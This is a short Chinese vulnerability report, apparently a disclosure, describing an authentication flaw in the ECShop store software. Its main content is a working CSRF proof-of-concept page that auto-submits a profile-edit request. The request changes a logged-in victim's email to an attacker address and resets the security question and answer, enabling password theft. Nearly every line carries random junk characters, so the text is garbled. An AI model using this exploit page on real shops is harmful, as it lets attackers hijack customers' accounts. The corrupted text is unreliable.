简要描述:) Z0 B) V1 ~+ C
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
+ |$ y& @! C& p. w3 g' t' B( m
/ H: j" G! f0 D' O! ~0 L4 S9 P# ?, }Demo For:http://www.wooyun.org/bug.php?action=view&id=395
1 `' q H" v; t/ ^% |" P& ` y) L9 U: j2 z
详细说明:
% ?" T1 U4 _$ b1 ]7 f: q利用csrf和xss可以突破官方所说的“障碍”
q T" {5 {: `! cxss版本已经有人说明
7 b* V0 [2 [* b6 j5 J2 b+ Q这里给出csrf版本
" L4 N" U( c2 f: e" V8 _1 K* |
; S8 `5 F8 T7 N, f& K漏洞证明:
; @ X( u2 b- l3 V<html>
+ n' C. y0 B4 B4 Y" B$ n* |<body>
: `: ?& H' i F- ? i<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
6 D: W8 u# z6 j2 h/ e<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
& D5 v7 O" H3 x6 g, x3 h<INPUT TYPE="text" NAME="act" value="act_edit_profile">6 u) {5 M0 \4 u s J
<INPUT TYPE="text" NAME="sel_question" value="ecshop">3 Y3 m9 ~' F+ A: j4 E) O, l) b
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
. H# F, K: `, p- E; P</body>
' @5 g- y- ~' q6 H- a<script>* @5 P; E! J* k0 {6 t
document.forms[0].submit();
1 x; t5 J+ x, Z; B7 }</script>: Y( `: Q( ?) D* t
</html>3 P$ p; [4 U6 D2 q+ F) ]
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失
7 j# ~; c3 [: [
, I. E3 b! M/ O# k, ~ |